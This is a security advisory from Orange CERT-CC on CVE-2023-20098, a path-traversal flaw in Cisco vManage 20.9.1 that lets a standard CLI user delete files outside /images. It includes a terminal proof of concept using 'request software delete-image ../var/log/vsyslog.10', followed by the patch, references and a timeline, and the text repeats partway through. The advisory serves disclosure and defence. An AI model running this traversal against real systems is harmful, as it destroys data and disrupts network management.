Overview
Loss of vManage firmware image availability
Details
On vManage 20.9.1, CLI users with access to “request software delete-image” can delete files outside /images directory.
Below, demo deleting a log file that I don’t have rights to delete directly on shell.
This command does not exist in 20.6.4, so current production versions are not affected.
Proof of Concept
Following commands executed as standard user (not root):
BGE-VDR-vMM-2:/var/log$ ls -l vsyslog*
-rw-r--r-- 1 root adm 4204176 Oct 27 08:56 vsyslog
-rw-r--r-- 1 root adm 10485911 Oct 25 21:53 vsyslog.1
-rw-r--r-- 1 root root 10485838 Sep 8 11:45 vsyslog.10
-rw-r--r-- 1 root adm 10485942 Oct 22 05:36 vsyslog.2
-rw-r--r-- 1 root adm 10485834 Oct 18 13:24 vsyslog.3
-rw-r--r-- 1 root adm 10486296 Oct 14 21:24 vsyslog.4
-rw-r--r-- 1 root adm 10488153 Oct 11 05:24 vsyslog.5
-rw-r--r-- 1 root adm 10486362 Oct 7 13:16 vsyslog.6
-rw-r--r-- 1 root adm 10485894 Oct 3 23:26 vsyslog.7
-rw-r--r-- 1 root adm 10485851 Sep 30 07:25 vsyslog.8
-rw-r--r-- 1 root adm 10485910 Sep 26 15:38 vsyslog.9
BGE-VDR-vMM-2:/var/log$ rm vsyslog.10
rm: remove write-protected regular file 'vsyslog.10'? y
rm: cannot remove 'vsyslog.10': Permission denied
BGE-VDR-vMM-2:/var/log$ exit
exit
BGE-VDR-vMM-2# request software delete-image ../var/log/vsyslog.10
status Deleted /images/../var/log/vsyslog.10
BGE-VDR-vMM-2# vs
BGE-VDR-vMM-2:~$ ls -l /var/log/vsyslog.*
-rw-r--r-- 1 root adm 10485911 Oct 25 21:53 /var/log/vsyslog.1
-rw-r--r-- 1 root adm 10485942 Oct 22 05:36 /var/log/vsyslog.2
-rw-r--r-- 1 root adm 10485834 Oct 18 13:24 /var/log/vsyslog.3
-rw-r--r-- 1 root adm 10486296 Oct 14 21:24 /var/log/vsyslog.4
-rw-r--r-- 1 root adm 10488153 Oct 11 05:24 /var/log/vsyslog.5
-rw-r--r-- 1 root adm 10486362 Oct 7 13:16 /var/log/vsyslog.6
-rw-r--r-- 1 root adm 10485894 Oct 3 23:26 /var/log/vsyslog.7
-rw-r--r-- 1 root adm 10485851 Sep 30 07:25 /var/log/vsyslog.8
-rw-r--r-- 1 root adm 10485910 Sep 26 15:38 /var/log/vsyslog.9
BGE-VDR-vMM-2:~$ exit
exit
BGE-VDR-vMM-2# show ver
20.9.1
Solution
Security patch
Upgrade to patched Cisco IOS release, as described in Cisco Security Advisory
References
https://nvd.nist.gov/vuln/detail/CVE-2023-20098
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-priv-escalate-Xg8zkyPk
Credits
Orange CERT-CC
Frederic MEZOU at Orange Business
Timeline
Date reported: October28, 2022
Date fixed: April 19, 2023
Overview
Loss of vManage firmware image availability
Details
On vManage 20.9.1, CLI users with access to “request software delete-image” can delete files outside /images directory.
Below, demo deleting a log file that I don’t have rights to delete directly on shell.
This command does not exist in 20.6.4, so current production versions are not affected.
Proof of Concept
Following commands executed as standard user (not root):
Solution
Security patch
Upgrade to patched Cisco IOS release, as described in Cisco Security Advisory
References
https://nvd.nist.gov/vuln/detail/CVE-2023-20098
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-priv-escalate-Xg8zkyPk
Credits
Orange CERT-CC
Frederic MEZOU at Orange Business
Timeline
Date reported: October28, 2022
Date fixed: April 19, 2023